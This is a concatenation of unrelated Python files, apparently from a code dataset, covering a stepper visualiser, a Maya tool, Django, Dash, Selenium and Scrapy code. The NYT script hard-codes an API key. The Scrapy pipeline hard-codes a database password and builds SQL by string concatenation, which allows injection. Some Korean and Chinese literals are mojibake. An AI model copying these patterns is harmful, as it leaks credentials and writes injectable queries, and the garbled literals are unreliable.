    # Tally the k-NN votes into the three food groups and report the winner
    # (protein / fruit / vegetable; unknown labels count as vegetable).
    # NOTE(review): the Korean string literals below are mojibake in this
    # copy (original encoding lost, some broken across lines) — restore them
    # from a clean source before running.
    protein = fruit = vegetable = 0
    for c in class_result.keys():
        if c == '๋จ๋ฐฑ์ง':
            protein = class_result[c]
        elif c == '๊ณผ์ผ':
            fruit = class_result[c]
        else:
            vegetable = class_result[c]
    if protein > fruit and protein > vegetable:
        result = "๋ถ๋ฅ๋์์ ๋จ๋ฐฑ์ง ์
๋๋ค."
    elif fruit > protein and fruit > vegetable:
        result = "๋ถ๋ฅ๋์์ ๊ณผ์ผ ์
๋๋ค"
    else:
        result = "๋ถ๋ฅ๋์์ ์ฑ์ ์
๋๋ค."
    return result
a = classify_result(class_result)
print(a) |
12,963 | ada618dcac4e4e7691dd37c2131e2ce40c32779a | import time
import matplotlib.pyplot as plt
from math import pi, sin, cos
class VirtualStepper:
    """
    A visualization of a stepper motor for use in remote learning workshops
    where not everyone has access to stepper motors.
    """

    # Number of steppers created so far; used to auto-name new instances.
    count = 0

    def __init__(self, name=None, n_steps=256, delay=1e-3):
        """
        Since virtual steppers are virtual, we don't need pins or step
        sequences. We're still using delay and n_steps to resemble physical
        steppers.
        """
        self.fig, self.ax = plt.subplots(figsize=(3, 3))
        self.n_steps = n_steps
        self.delay = delay
        self.step_size = 2 * pi / self.n_steps
        if name is None:
            self.name = 'Stepper {}'.format(VirtualStepper.count + 1)
        else:
            # BUGFIX: the original never stored a caller-supplied name, which
            # made every subsequent draw() fail with AttributeError.
            self.name = name
        self.angle = 0.0
        self.check()
        self.inv = False
        VirtualStepper.count += 1
        plt.ion()
        plt.show()
        self.draw()

    def draw(self):
        """Redraw the arrow indicating the current shaft angle."""
        self.ax.cla()
        # Raw string so '\pi' reaches mathtext untouched (avoids the invalid
        # escape-sequence warning of the original literal).
        self.ax.set_title(r'{}: Angle = {:.2f}$\pi$'.format(self.name, self.angle % (2*pi) / pi))
        self.ax.set_xlim(-1, 1)
        self.ax.set_ylim(-1, 1)
        self.ax.arrow(0, 0, cos(self.angle), sin(self.angle),
                      length_includes_head=True, head_length=0.3, head_width=0.1)
        self.fig.canvas.draw()
        plt.pause(1e-3)

    def reverse(self):
        """Invert the rotation direction of subsequent rotate_by/rotate_to calls."""
        self.inv = True

    def unreverse(self):
        """Restore the normal rotation direction."""
        self.inv = False

    def rotate_to(self, angle, degrees=False):
        """
        Rotates to the angle specified (chooses the direction of minimum rotation)
        """
        target = angle * pi / 180 if degrees else angle
        curr = self.angle
        diff = (target - curr) % (2*pi)
        # Take the shorter way around the circle.
        if abs(diff - (2*pi)) < diff:
            diff = diff - (2*pi)
        self.rotate_by(diff)

    def rotate_by(self, angle, degrees=False):
        """
        Rotate the stepper by this angle (radians unless *degrees* is True).
        Positive angles rotate one way, negative the other; reverse() swaps
        the directions.
        """
        target = angle * pi / 180 if degrees else angle
        if self.inv:
            target = -target
        # The step count rounds up, so requests that are not an exact
        # multiple of step_size overshoot by less than one step (original
        # behavior, preserved).
        if target > 0:
            n = int(target // self.step_size) + 1
            for _ in range(n):
                self.step_c()
        else:
            n = int(-target // self.step_size) + 1
            for _ in range(n):
                self.step_cc()
        # BUGFIX: removed the original trailing "if self.inv: diff = -diff" —
        # *diff* was never defined in this scope, so any reversed rotation
        # raised NameError; the inversion is already applied to *target* above.

    def zero(self):
        """
        Resets the position of the stepper to 0
        """
        self.angle = 0.0
        self.draw()
        time.sleep(self.delay)

    def step_c(self):
        """Advance one step clockwise and redraw."""
        self.angle += self.step_size
        self.angle = self.angle % (2*pi)
        self.draw()
        time.sleep(self.delay)

    def step_cc(self):
        """Advance one step counterclockwise and redraw."""
        self.angle -= self.step_size
        self.angle = self.angle % (2*pi)
        self.draw()
        time.sleep(self.delay)

    def check(self):
        """Wiggle one step forward and back to show the motor is alive."""
        self.step_c()
        self.step_cc()
|
12,964 | 6f8c9e14e8995ba03cf6a3a82c7001b78e89cbdd | '''
========================================================================================================================
Author: Alan Camilo
www.alancamilo.com
Requirements: aTools Package
------------------------------------------------------------------------------------------------------------------------
To install aTools, please follow the instructions in the file how_to_install.txt
------------------------------------------------------------------------------------------------------------------------
To uninstall aTools, go to menu (the last button on the right), Uninstall
========================================================================================================================
'''
from maya import cmds
from maya import mel
from aTools.generalTools.aToolsGlobals import aToolsGlobals as G
from aTools.commonMods import uiMod
from aTools.commonMods import utilMod
from aTools.commonMods import animMod
from aTools.commonMods import aToolsMod
import maya.OpenMaya as om
#============================================================================================================
class MicroTransform(object):
    """Maya tool that damps manipulator input so selected objects can be
    nudged with very fine (micro) transform increments.

    Python 2 / Maya only: relies on maya.cmds, OpenMaya attribute-changed
    callbacks and the aTools globals object ``G``.
    """

    # Class-definition-time side effect: kill script jobs left over from a
    # previous load of this module.
    utilMod.killScriptJobs("G.microTransformScriptJobs")

    def __init__(self):
        G.deferredManager.removeFromQueue("MT_blinking")
        # Singleton-ish: only the first instance registers itself.
        if G.aToolsBar.microTransform: return
        G.aToolsBar.microTransform = self
        # Transform attributes watched by the attribute-changed callback.
        self.attributes = ['translate', 'translateX','translateY','translateZ','rotate', 'rotateX', 'rotateY', 'rotateZ', 'scale', 'scaleX','scaleY','scaleZ']
        # Available damping factors (smaller value == finer motion).
        self.multiplierValues = [{"name": "ultraSlow", "value": .05},
                                 {"name": "superSlow", "value": .2},
                                 {"name": "slow", "value": .5},
                                 {"name": "medium", "value": 1}]
        self.defaultMultiplier = "slow"
        self.microTransformStartTimer = {}  # per-node drag-speed timers
        self.microTransformValues = {}      # last cached attribute values
        self.onOff = False
        # Remember the user's rotate-manipulator mode so it can be restored.
        self.rotationOrientMode = cmds.manipRotateContext('Rotate', query=True, mode=True)
        self.setMultiplier(self.getMultiplier())
        self.removeMicroTransform()
        self.blinkingButton(self.onOff)

    def blinkingButton(self, onOff):
        # Blink the toolbar button every .3s while the tool is active.
        if onOff: G.aToolsBar.timeoutInterval.setInterval(self.toggleButtonActive, .3, id="MT_blinking")
        else: G.aToolsBar.timeoutInterval.stopInterval("MT_blinking")

    def toggleButtonActive(self):
        # Flip between the active/inactive button images (blink step).
        onOff = "active" in cmds.iconTextButton("microTransformBtn", query=True, image=True)
        self.setButtonImg(not onOff)

    def setButtonImg(self, onOff):
        if onOff:
            cmds.iconTextButton("microTransformBtn", edit=True, image=uiMod.getImagePath("specialTools_micro_transform_active"), highlightImage= uiMod.getImagePath("specialTools_micro_transform_active"))
        else:
            cmds.iconTextButton("microTransformBtn", edit=True, image=uiMod.getImagePath("specialTools_micro_transform"), highlightImage= uiMod.getImagePath("specialTools_micro_transform copy"))

    def switch(self):
        # Toggle the tool on/off (bound to the toolbar button).
        self.onOff = (not self.onOff)
        self.setButtonImg(self.onOff)
        self.blinkingButton(self.onOff)
        self.setMode(self.onOff)

    def setMode(self, onOff):
        utilMod.killScriptJobs("G.microTransformScriptJobs")
        if onOff:
            self.rotationOrientMode = cmds.manipRotateContext('Rotate', query=True, mode=True)
            cmds.manipRotateContext('Rotate', edit=True, mode=2)#gimbal
            #update values on turning on
            self.addMicroTransform()
            G.microTransformScriptJobs = []
            # get the current selected object values
            G.microTransformScriptJobs.append(cmds.scriptJob(runOnce = False, killWithScene = False, event =('SelectionChanged', self.addMicroTransform )))
            G.microTransformScriptJobs.append(cmds.scriptJob(runOnce = False, killWithScene = False, event =('timeChanged', self.updateValues )))
            G.microTransformScriptJobs.append(cmds.scriptJob(runOnce = False, killWithScene = False, event =('Undo', self.updateValues )))
            G.microTransformScriptJobs.append(cmds.scriptJob(runOnce = False, killWithScene = False, event =('Redo', self.updateValues )))
            G.microTransformScriptJobs.append(cmds.scriptJob(runOnce = False, killWithScene = False, event =('DragRelease', self.release )))
            #print "microTransform is ON."
        else:
            cmds.manipRotateContext('Rotate', edit=True, mode=self.rotationOrientMode)
            self.removeMicroTransform()
            #print "microTransform is OFF."

    def changedMicroTransform(self, msg, mplug, otherMplug, clientData):
        # OpenMaya attribute-changed callback: replaces the raw attribute
        # delta with one damped by self.multiplier, scaled down further the
        # faster the user drags.
        #cmds.undoInfo(stateWithoutFlush=False)
        if om.MNodeMessage.kAttributeSet == (om.MNodeMessage.kAttributeSet & msg) and not om.MGlobal.isUndoing() and not om.MGlobal.isRedoing():
            nodeName, attrName = mplug.name().split('.')
            #print "changed!"
            if attrName not in self.attributes: return
            nodeAttr = mplug.name()
            val = cmds.getAttr(nodeAttr)
            mtValue = self.microTransformValues["%s_%s"%(nodeName, attrName)]
            if str(val) != str(mtValue):
                #timer: measure time since the last change on this node to
                # estimate drag speed (has_key: this is Python 2 code).
                if not self.microTransformStartTimer.has_key("%s"%nodeName):
                    self.microTransformStartTimer["%s"%nodeName] = cmds.timerX()
                microTransformTimer = cmds.timerX(startTime=self.microTransformStartTimer["%s"%nodeName])
                self.microTransformStartTimer["%s"%nodeName] = cmds.timerX()
                microTransformTimer *= 50
                if microTransformTimer == 0: microTransformTimer = 1000
                mult = self.multiplier/microTransformTimer
                if mult >= self.multiplier: mult = self.multiplier
                self.undoChunkFn("open")
                #print "changedMicroTransform"
                if type(val) is list:
                    # Compound attribute (e.g. 'translate'): damp each axis.
                    temp = ()
                    for n, loopVal in enumerate(val[0]):
                        dif = loopVal-mtValue[0][n]
                        temp = temp + (mtValue[0][n]+(dif*mult),)
                    newVal = [temp]
                    self.microTransformValues["%s_%s"%(nodeName, attrName)] = newVal
                    #xyz
                    self.microTransformValues["%s_%sX"%(nodeName, attrName)] = newVal[0][0]
                    self.microTransformValues["%s_%sY"%(nodeName, attrName)] = newVal[0][1]
                    self.microTransformValues["%s_%sZ"%(nodeName, attrName)] = newVal[0][2]
                    # NOTE(review): eval here is redundant with the three
                    # setAttr calls below — confirm before removing.
                    eval("cmds.setAttr(nodeAttr, %s,%s,%s)"%(newVal[0][0],newVal[0][1],newVal[0][2]))
                    #xyz
                    cmds.setAttr("%sX"%nodeAttr, newVal[0][0])
                    cmds.setAttr("%sY"%nodeAttr, newVal[0][1])
                    cmds.setAttr("%sZ"%nodeAttr, newVal[0][2])
                else:
                    # Single-axis attribute: damp the scalar delta.
                    dif = val-mtValue
                    newVal = mtValue+(dif*mult)
                    self.microTransformValues["%s_%s"%(nodeName, attrName)] = newVal
                    #xyz inverse: refresh the cached parent compound value
                    val = cmds.getAttr("%s.%s"%(nodeName, attrName[:-1]))
                    self.microTransformValues["%s_%s"%(nodeName, attrName[:-1])] = val
                    cmds.setAttr(nodeAttr, newVal)
            else:
                # Value unchanged: just refresh the cache.
                self.microTransformValues["%s_%s"%(nodeName, attrName)] = cmds.getAttr(nodeAttr)
                if type(val) is list:
                    valX = cmds.getAttr("%s.%sX"%(nodeName, attrName))
                    valY = cmds.getAttr("%s.%sY"%(nodeName, attrName))
                    valZ = cmds.getAttr("%s.%sZ"%(nodeName, attrName))
                    #xyz
                    self.microTransformValues["%s_%sX"%(nodeName, attrName)] = valX
                    self.microTransformValues["%s_%sY"%(nodeName, attrName)] = valY
                    self.microTransformValues["%s_%sZ"%(nodeName, attrName)] = valZ
                else:
                    #xyz inverse
                    val = cmds.getAttr("%s.%s"%(nodeName, attrName[:-1]))
                    self.microTransformValues["%s_%s"%(nodeName, attrName[:-1])] = val
        #cmds.undoInfo(stateWithoutFlush=True)

    def release(self):
        # DragRelease: close the undo chunk and re-sync cached values.
        self.undoChunkFn("close")
        self.updateValues()
        self.microTransformStartTimer = {}

    def undoChunkFn(self, openClose):
        # Keep all damped edits of one drag inside a single undo chunk.
        if openClose == "open":
            if self.undoChunk == "closed":
                # NOTE(review): the repeated open/close pairs appear to flush
                # Maya's undo queue state before the real open — confirm.
                cmds.undoInfo(openChunk=True)
                cmds.undoInfo(closeChunk=True)
                cmds.undoInfo(openChunk=True)
                cmds.undoInfo(closeChunk=True)
                cmds.undoInfo(openChunk=True)
                cmds.undoInfo(closeChunk=True)
                cmds.undoInfo(openChunk=True)
                self.undoChunk = "open"
                #print "openChunk"
        else:
            if self.undoChunk == "open":
                cmds.undoInfo(closeChunk=True)
                self.undoChunk = "closed"
                #print "closeChunk"

    def addMicroTransform(self):
        # Attach an attribute-changed callback to every selected node.
        self.updateValues()
        cmds.undoInfo(stateWithoutFlush=False)
        sel = cmds.ls(selection=True)
        if G.MT_lastSel:
            # Skip re-attaching when the selection is unchanged and the user
            # is working in the graph editor.
            graphEditorFocus = cmds.getPanel(withFocus=True) == "graphEditor1"
            if sel == G.MT_lastSel and graphEditorFocus:
                cmds.undoInfo(stateWithoutFlush=True)
                return
        G.MT_lastSel = sel
        if len(sel) <= 0:
            cmds.undoInfo(stateWithoutFlush=True)
            return
        self.removeMicroTransform()
        G.microTransformIds = []
        self.undoChunk = "closed"
        MSelectionList = om.MSelectionList()
        om.MGlobal.getActiveSelectionList(MSelectionList)
        node = om.MObject()
        for n, loopSel in enumerate(sel):
            MSelectionList.getDependNode(n, node)
            clientData = None
            G.microTransformIds.append(om.MNodeMessage.addAttributeChangedCallback(node, self.changedMicroTransform, clientData))
        cmds.undoInfo(stateWithoutFlush=True)

    def removeMicroTransform(self):
        # Detach all callbacks (best effort; ids may already be gone).
        try:
            for loopId in G.microTransformIds:
                om.MNodeMessage.removeCallback(loopId)
        except: pass
        G.microTransformIds = None

    def updateValues(self):
        # Cache the current values of every watched attribute on selection.
        #print "updateValues"
        self.microTransformValues = {}
        sel = cmds.ls(selection=True)
        for loopSel in sel:
            for loopAttr in self.attributes:
                val = cmds.getAttr("%s.%s"%(loopSel, loopAttr))
                self.microTransformValues["%s_%s"%(loopSel, loopAttr)] = val

    def setMultiplier(self, option):
        # Select a damping factor by name and persist it in user prefs.
        name = None
        for loopOption in self.multiplierValues:
            if loopOption["name"] == option:
                value = loopOption["value"]
                name = loopOption["name"]
        if not name: #in case file is corrupt
            self.setMultiplier(self.defaultMultiplier)
            return
        self.multiplier = value
        aToolsMod.saveInfoWithUser("userPrefs", "microTransform", name)

    def getMultiplier(self):
        # Load the persisted multiplier name, falling back to the default.
        name = aToolsMod.loadInfoWithUser("userPrefs", "microTransform")
        if name == None: name = self.defaultMultiplier
        return name

    def popupMenu(self, *args):
        # Lazy popup menu; populated on first open.
        menu = cmds.popupMenu()
        cmds.popupMenu(menu, edit=True, postMenuCommand=self.populateMenu, postMenuCommandOnce=True)

    def populateMenu(self, menu, *args):
        # Radio menu listing the multiplier options.
        cmds.radioMenuItemCollection(parent=menu)
        for loopOption in self.multiplierValues:
            radioSelected = (self.multiplier == loopOption["value"])
            option = loopOption["name"]
            cmds.menuItem (label=utilMod.toTitle(loopOption["name"]), radioButton=radioSelected, command=lambda x, option=option, *args: self.setMultiplier(option), parent=menu)
|
12,965 | c26a7a035a42f0bd365021df03d4f32097818698 | from django.apps import AppConfig
class SqueryConfig(AppConfig):
    """Django application configuration for the ``squery`` app."""
    name = 'squery'
|
12,966 | d9992011a3b48f77f3df250c79f327759c7c8ddd | import pandas as pd
import numpy as np
import plotly.graph_objs as go
import plotly.express as px
import plotly.colors
from collections import OrderedDict
import requests
from pynytimes import NYTAPI
import datetime
def _articles_to_df(data):
    """Flatten the NYT archive API payload into a DataFrame, one row per article."""
    rows = []
    for article in data:
        rows.append([article.get("section_name"),
                     article.get("news_desk"),
                     article.get("pub_date"),
                     article.get("headline").get("main"),
                     article.get("abstract"),
                     article.get("lead_paragraph"),
                     article.get("type_of_material"),
                     article.get("word_count")])
    return pd.DataFrame(rows, columns=["section_name", "news_desk", "pub_date",
                                       "headline", "abstract", "lead_paragraph",
                                       "type_of_material", "word_count"])


def _pie_figure(series, title):
    """Build one donut-style pie figure dict from a column's value_counts()."""
    counts = series.value_counts()
    graph = [go.Pie(labels=counts.index,
                    values=counts.values,
                    hole=.6,
                    textposition="inside")]
    return dict(data=graph, layout=dict(title=title))


def return_figures():
    """ Creates five plotly visualizations using the New York Times Archive API

    Returns:
        list (dict): list containing the five plotly visualizations
    """
    # SECURITY(review): the API key is hard-coded; move it to an environment
    # variable or config file before publishing this code.
    nyt = NYTAPI("AsjeHhqDYrePA2GMPpYoY1KAKAdG7P99")

    # Select Year and Month of articles
    data = nyt.archive_metadata(
        date = datetime.datetime(2020, 7, 1)
    )
    df = _articles_to_df(data)

    # Charts 1-3: donut pies over section, news desk and material type
    # (the original repeated this block three times verbatim).
    figures = [
        _pie_figure(df.section_name,
                    'Distribution of sections of this months New York Times articles'),
        _pie_figure(df.news_desk,
                    'Distribution of news desk of this months articles'),
        _pie_figure(df.type_of_material,
                    'Distribution for type of material of this months articles'),
    ]

    # Chart 4: articles published per day, as a line chart.
    df["pub_date"] = pd.to_datetime(df["pub_date"]).dt.date
    per_day = df.pub_date.value_counts().to_frame().sort_index()
    graph_four = [go.Scatter(x=per_day.index,
                             y=per_day["pub_date"],
                             mode="lines",
                             name="Articles")]
    figures.append(dict(data=graph_four,
                        layout=dict(title='Number of articles published by days')))

    # Chart 5: single-cell table with the average word count.
    avg_word_count = round(df.word_count.mean(), 0)
    graph_five = [go.Table(header=dict(values=['Average Word Count']),
                           cells=dict(values=[avg_word_count]))]
    figures.append(dict(data=graph_five, layout=dict(title='')))

    return figures
|
12,967 | 32ee73ee7fee4be1fab6eeec997c167d6b8ce600 | # Generated by Django 3.1 on 2020-09-25 19:59
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Flips the FK direction: drops Property.tenant and adds a one-to-one
    # Tenant.rental_property pointing back at Property.

    dependencies = [
        ('app', '0001_initial'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='property',
            name='tenant',
        ),
        migrations.AddField(
            model_name='tenant',
            name='rental_property',
            # default=15 only backfills existing rows during this migration;
            # preserve_default=False removes it from the model afterwards.
            field=models.OneToOneField(
                default=15, on_delete=django.db.models.deletion.CASCADE, to='app.property'),
            preserve_default=False,
        ),
    ]
|
12,968 | 1050757987f91753e3c34baf4b04993958adfae6 | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
import MySQLdb
import logging
from scrapy import log
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
class DangdangpcPipeline(object):
def __init__(self):
conn = MySQLdb.connect(
host='127.0.0.1',
port=3306,
user='root',
passwd='panli',
db='db_dangdang_re',
charset='utf8'
)
self.conn = conn
def process_item(self, item, spider):
try:
self.conn.ping()
except:
self.conn.ping(True)
cur = self.conn.cursor()
sql = " insert into pc_infor(name,comment_num,url,price,img_url) values ('"\
+ str(item['title'][0]) + "', '"\
+ str(item['comment_num'][0])+"', '"\
+ str(item['link'])+"', '"\
+ str(item['price'][0])+"', '"\
+ str(item['img_url'][0])+"')"
try:
cur.execute(sql)
self.conn.commit()
except Exception, e:
log.msg("mysql error " + str(e), _level=logging.ERROR)
cur.close()
name = item['title'][0]
price = item['price'][0]
comment_num = item['comment_num'][0]
url = item['link']
img_url = item['img_url'][0]
print u'ๅๅๅ็งฐ:'+name
print u'ๅๅ่ฏ่ฎบ:'+comment_num
print u'ๅๅไปทๆ ผ:'+price
print u'ๅๅ้พๆฅ:'+url
print u'ๅๅๅพ็:'+img_url
print '--------------------------------'
return item
def __del__(self):
self.conn.close() |
12,969 | 1c34ace6cb5e4c751c7b56f30e8f47c2623b9566 | from train import MailEngineRailcarConsist, DieselRailcarMailUnit
def main(roster_id):
consist = MailEngineRailcarConsist(roster_id=roster_id,
id='mail_rail',
base_numeric_id=3000,
name='Mail Rail',
role='mail_railcar_1',
power=700,
gen=6,
sprites_complete=True,
intro_date_offset=-5) # introduce early by design
consist.add_unit(type=DieselRailcarMailUnit,
weight=37,
chassis='railcar_32px',
tail_light='railcar_32px_2')
return consist
|
12,970 | 232ee8663f7753b3a1bfb95bdb07faec1e229c85 | '''
Description:
Write a function, factory, that takes a number as its parameter and returns another function.
The returned function should take an array of numbers as its parameter, and return an array of those numbers multiplied by the number that was passed into the first function.
In the example below, 5 is the number passed into the first function. So it returns a function that takes an array and multiplies all elements in it by five.
Translations and comments (and upvotes) welcome!
Example
fives = factory(5) # returns a function - fives
my_array = [1, 2, 3]
fives(my_array) # returns [5, 10, 15]
'''
def factory(x):
    """Return a function that multiplies every element of a list by *x*."""
    def multiply_all(values):
        return [x * v for v in values]
    return multiply_all
12,971 | ea7d6927a4f4f971c0b34f64cd0b0b31284f3a56 | import dash
import dash_bootstrap_components as dbc
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
from app import app
header = dbc.Col(
dcc.Markdown(
'# Process',
className='mb-5',
style={
'textAlign': 'center',
'textDecoration': 'underline'
}
)
)
column1 = dbc.Col(
[
dcc.Markdown(
"""
#### Gathering Data
For this project I got data from the [Bureau of Economic Analysis](https://www.bea.gov/data/economic-accounts/industry).
The data came as 9 different datasets. Each dataset was one economic measure over time. There was data on 91 industries over the 50 states,
plus a few aggregations of regions and the country as a whole.
"""
),
html.Img(src='assets/df_2.png',
className='img-fluid',
),
html.Br(),
html.Br(),
dcc.Markdown(
"""
### Cleaning Data
Cleaning the data turned out to be a bit tricky because each dataset had labeled missing values differently. I was able to find the labels
by noticing the numeric columns had an object datatype and trying to change them to numeric would throw an error. Looking at all the values
in the column, I could find the ones that weren't numbers and replace them with NaNs to be dealt with.
To fill the NaN values, I used the data from the previous or following year as that would represent the closest I could get to the real
value. Using mean or median of the column, a standard practice for filling NaNs would not have worked due to the vastly different sizes
of industries in different places.
#### Wrangling Data
Each dataset had a bunch of descriptive columns. Some, such as GeoName (State) and Description (Industry) were crucial.
Others, like GeoFIPS, Region, and IndustryId were redundant. Component Name and Unit were important but not useful in the current form.
The actual data columns were just named with the year. Since each dataset had this same structure, I needed to rename the data columns so
the information in them would be retained through a merge.
I used the component name information and tacked that on to the year in the column names so each column now had both a year and an economic
component being measured.
"""
),
html.Div(
html.Img(
src='assets/merged_df_example.png',
className='img-fluid',
),
style={'textAlign':'center'}
),
html.Br(),
dcc.Markdown(
"""
At this point I had my single dataset with all the important information preserved but I wasn't done yet.
The data I have is essentially time-series data. The order of the years matters. However that won't be captured by the computer looking
at the data.
To bring to life the time component of this data I created some new features that measured changes over time. One feature that proved
particularly useful for my model was how much Payroll increased year-over-year.
### Modeling
Before beginning to build and iterate on a model, I needed to decide what the target would be. Although the dataset came with a feature
for the growth rate of an industry in a given year, I decided to alter it and aim for predicting whether or not the industry would grow
in the coming year. I created a column that was True/False if the industry had grown, and the latest year of data I had was the target.
(If an industry had a 0% growth rate I counted that as False)
I split off and held out a test set, only manipulating it to engineer the same features as I did for the training set. The baseline model
to beat was 60%, being the accuracy you would get if you just guessed every industry in every state would **grow**. If my model couldn't do
significantly better than that, it wouldn't be very useful.
I used both a 3-way split and [cross-validation](https://jakevdp.github.io/PythonDataScienceHandbook/05.03-hyperparameters-and-model-validation.html)
to iterate on my model. The 3-way split I used for trying new model types and cross-validation I used for tuning the hyperparameters.
Right away I saw improvements over the baseline and it was the case here that more complex models did better. For the final
model I used all the features from the two previous years as well as the features I had engineered (which incorporated older
                information as well). The best model for this problem was scikit-learn's [GradientBoostingClassifier](https://scikit-learn.org/stable/modules/generated/sklearn.ensemble.GradientBoostingClassifier.html)
and, with the right hyperparameters, I got an accuracy score of nearly 80%.
"""
),
html.Div(
html.Img(
src='assets/final_test_accuracy.png', className='img-fluid',
style={
'height': '50%',
'width': '50%'
}
),
style={'textAlign': 'center'}
),
html.Br(),
dcc.Markdown(
"""
In the bar plot below, we can see the 10 most important features in the model. To get a better sense of how different values
for each feature affect individual predictions, head over to [Insights](/insights) to zoom in on a few interesting predictions.
Or you can go to [Predictions](/predictions) to tune the features yourself and see what the model predicts!
"""
),
html.Div(
html.Img(
src='assets/feat_imps_label.png',
className='img-fluid'
),
style={'textAlign': 'center'}
),
],
)
layout = header, dbc.Row([column1]) |
12,972 | 73c03656e36f5e7cfee72f44de7ff27584169dec | from selenium import webdriver
from time import ctime, sleep
import threading
from selenium.webdriver.common.by import By
def browers_search(browername, keyword):
    # Launch the requested browser, run a Baidu search for *keyword*, then
    # quit.  Designed to be run concurrently from several threads.
    # NOTE(review): "browers" is a typo kept for existing callers; the
    # Chinese string literals below are mojibake in this copy (some broken
    # across lines) — restore from a clean source before running.
    print("ๅฏๅจๆถ้ด๏ผ%s" % ctime())
    print("ๆต่งๅจ้ฉฑๅจ๏ผ%s, ๆ็ดขๅ
ณ้ฎ่ฏ๏ผ%s" % (browername, keyword))
    if browername == 'Chrome':
        driver = webdriver.Chrome()
    elif browername == 'FireFox':
        driver = webdriver.Firefox()
    elif browername == 'IE':
        driver = webdriver.Ie()
    else:
        # Unsupported browser name: message only; *driver* stays unbound and
        # the next line raises — upstream defect, left unchanged here.
        print("้ฉฑๅจๆ่ฏฏ๏ผไป
ๆฏๆChrome,FireFox,IE")
    driver.maximize_window()
    driver.implicitly_wait(10)
    driver.get("https://www.baidu.com")
    driver.find_element(By.ID, "kw").send_keys(keyword)
    driver.find_element(By.ID, "su").click()
    sleep(3)
    driver.quit()
if __name__ == '__main__':
    # Fan out one thread per (browser, keyword) pair and wait for them all.
    dicts = {'Chrome': 'selenium', 'FireFox': 'unittest', 'IE': 'python'}
    # Build the thread list directly; the original used index-based
    # range(len(...)) loops, replaced with direct iteration.
    threads = [threading.Thread(target=browers_search, args=(browername, keyword))
               for browername, keyword in dicts.items()]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    print("็ปๆๆถ้ด๏ผ%s" % ctime())
|
12,973 | 8640cfd9b63e759cfd37f23f116f48c7a1c0b16f | import os
from time import time
from geoNet import scrapeGeoNet as sg
from geoNet.gen_stats_kml import write_stats_kml
init_time = time()

# First get statsll dictionary by assigning lon, lat from the saved list known
# to be in WGS84 coordinates
fname = "ex_stats.ll"
loc_all_geoNet_stats = "/nesi/projects/nesi00213/StationInfo"
fname_all_geoNet_stats = "all_geoNet_stats+2016-12-20.ll"
loc_V1A = "/".join([os.getcwd(), "Vol1", "data"])

(event_stats1, fname_statsll) = sg.statsll_from_V1A_v2(
    loc_all_geoNet_stats,
    fname_all_geoNet_stats,
    loc_V1A,
    save_stats=False,
    fname=fname,
    loc=os.getcwd(),
)

# Now create another dictionary in which the lon, lat are read from .V1A files
# which may or may not be in WGS84 coordinates. Unless something goes wrong
# this should contain all the downloaded stations
# Note fname=None crashed
event_stats2, _ = sg.statsll_from_V1A(
    loc_V1A, save_stats=False, fname=fname, loc=os.getcwd()
)

# Find stats that are in event_stats2 but not in event_stats1
stat_codes1 = set(event_stats1.keys())
stat_codes2 = set(event_stats2.keys())

# perform check, then fall back to the .V1A coordinates for any station
# missing from the WGS84 list
if not stat_codes1.issubset(stat_codes2):
    print("Some station (lon, lat) were not read from .V1A files\n")
for stat_code in stat_codes2 - stat_codes1:
    event_stats1[stat_code] = event_stats2[stat_code]

# write statsll for this event (lon lat stat_code, fixed-width columns)
with open("/".join([os.getcwd(), fname]), "w") as f:
    for stat_code in event_stats1:
        (lon, lat) = event_stats1[stat_code]
        f.write("{:<15.4f} {:^15.4f} {:^10s} \n".format(lon, lat, stat_code))
# or use the convenience function
# write_statsll(loc, fname, event_stats1)

write_stats_kml(os.getcwd(), fname_statsll.split(".")[0] + ".kml", event_stats1)

final_time = time()
print("Done in {:10.1f} secs".format(final_time - init_time))
|
12,974 | 1647b8398d89b8adf1960dcd9f27d5ee39b7b6ab | import sys
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from PyQt5.QtGui import *
def window():
    """Build and run the Fahrenheit<->Celsius converter GUI.

    Blocks in the Qt event loop and exits the process when the window
    closes (sys.exit); never returns to the caller.
    """
    app = QApplication(sys.argv)
    win = QWidget()
    grid = QGridLayout()

    font = QFont()
    font.setFamily("Arial")
    font.setPointSize(14)

    l2 = QLabel()
    l2.setText("Fahrenheit")
    l3 = QLabel()
    l3.setText("Celsius")
    l2.setFont(font)
    l3.setFont(font)

    fahrenheit = 32.00
    celsius = 0.0

    le1 = QLineEdit()
    le1.setValidator(QDoubleValidator(0.99, 99.99, 2))
    le1.setText(str(fahrenheit))
    le2 = QLineEdit()
    le2.setValidator(QDoubleValidator(0.99, 99.99, 2))
    le2.setText(str(celsius))

    b1 = QPushButton(">>>>")
    b2 = QPushButton("<<<<")

    def fahToCel(self):
        # BUGFIX: the original computed (5/9)*(32 - F), which negates the
        # result; the correct conversion is C = (F - 32) * 5/9.
        fahrenheit = float(le1.text())
        newCelsius = (fahrenheit - 32) * (5 / 9)
        le2.setText(str(newCelsius))
        return self

    def celToFah(self):
        # F = C * 9/5 + 32
        celsius = float(le2.text())
        newFahrenheit = (celsius * (9 / 5)) + 32
        le1.setText(str(newFahrenheit))
        return self

    b1.clicked.connect(fahToCel)
    b2.clicked.connect(celToFah)

    grid.addWidget(l2, 1, 1)
    grid.addWidget(l3, 1, 2)
    grid.addWidget(le1, 2, 1)
    grid.addWidget(le2, 2, 2)
    grid.addWidget(b1, 3, 1)
    grid.addWidget(b2, 3, 2)

    win.setLayout(grid)
    win.setGeometry(300, 100, 300, 100)
    win.setWindowTitle("Temperature Converter")
    win.show()
    sys.exit(app.exec_())
if __name__ == '__main__':
window() |
12,975 | eb64a57004355cc8fb2f7b4eb15899abfcb81705 | f = open('hightemp.txt','r')
f1 = open('hightemp1.txt','w')
# Copy hightemp.txt (opened as `f` above) with each TAB expanded to a single
# space: expandtabs(1) sets tab stops at every column.
for line in f:
    f1.write(line.expandtabs(1))
f.close()
f1.close()
# cat hightemp.txt | tr '\t' ' '
|
12,976 | bd57201739478985b331be92ae603c2cac34834e | #!/usr/bin/env python
import kepmsg, kepkey
import sys, pyfits, tempfile, os, shutil, glob, numpy, warnings
# -----------------------------------------------------------
# delete a file
def delete(file,logfile,verbose):
